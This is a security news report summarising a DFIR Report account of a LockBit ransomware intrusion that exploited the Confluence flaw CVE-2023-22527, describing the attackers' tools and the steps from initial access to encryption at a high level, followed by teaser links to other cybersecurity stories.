In a swift and highly coordinated attack, LockBit ransomware operators exploited a critical remote code execution vulnerability (CVE-2023-22527) in Atlassian Confluence servers, targeting an exposed Windows server.
This vulnerability, rated CVSS 10.0, enabled unauthenticated attackers to execute arbitrary commands by injecting malicious Object-Graph Navigation Language (OGNL) expressions into improperly sanitized template files.
The attack commenced with system discovery commands, such as net user
and whoami
, to enumerate user accounts and gather system details.
The attackers leveraged this initial foothold to deploy AnyDesk for persistent access and used the Metasploit framework to establish command-and-control (C2) channels.
Within minutes, they escalated privileges by creating a new local administrator account and proceeded to disable security defenses, including Windows Defender.
Using Remote Desktop Protocol (RDP), the attackers moved laterally across the network, targeting key systems such as backup servers and file shares.
According to the DFIR Report, they employed tools like Mimikatz to extract credentials and SoftPerfect’s NetScan for network enumeration.
On the backup server, they executed PowerShell scripts to retrieve sensitive Veeam credentials and accessed additional systems using these compromised accounts.
Data exfiltration began just over an hour into the intrusion. The attackers used Rclone, a legitimate cloud storage tool, to transfer sensitive files to MEGA.io.
To cover their tracks, they cleared Windows event logs and deleted files associated with their operations.
Approximately two hours after initial access, the attackers launched the LockBit ransomware payload.
Initially, ransomware binaries were executed manually on specific servers via active RDP sessions.
To ensure widespread encryption, they utilized PDQ Deploy, an enterprise software deployment tool, automating the distribution of ransomware binaries across multiple endpoints via SMB shares.
A secondary encryption wave was triggered by mounting remote systems’ C$ shares as a failsafe mechanism.
The attack culminated in encrypted files bearing the .rhddiicoE
extension and ransom notes left on compromised systems.
The attackers also altered desktop backgrounds as part of their ransomware execution process.
This incident underscores the critical importance of patching known vulnerabilities promptly and implementing robust monitoring mechanisms to detect anomalous activity early in its lifecycle.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here
Apple has discontinued its Advanced Data Protection (ADP) feature for UK users following a legal…
The Wireshark Foundation has announced the release of Wireshark 4.4.4, the latest iteration of the…
The cryptocurrency sector faced one of its most significant security breaches this year as stablecoin…
GhostSocks, a Golang-based SOCKS5 backconnect proxy malware, has emerged as a significant threat within the…
A sophisticated phishing campaign impersonating OpenAI’s ChatGPT Premium subscription service has surged globally, targeting users…
A critical zero-day vulnerability in Parallels Desktop virtualization software has been publicly disclosed after seven…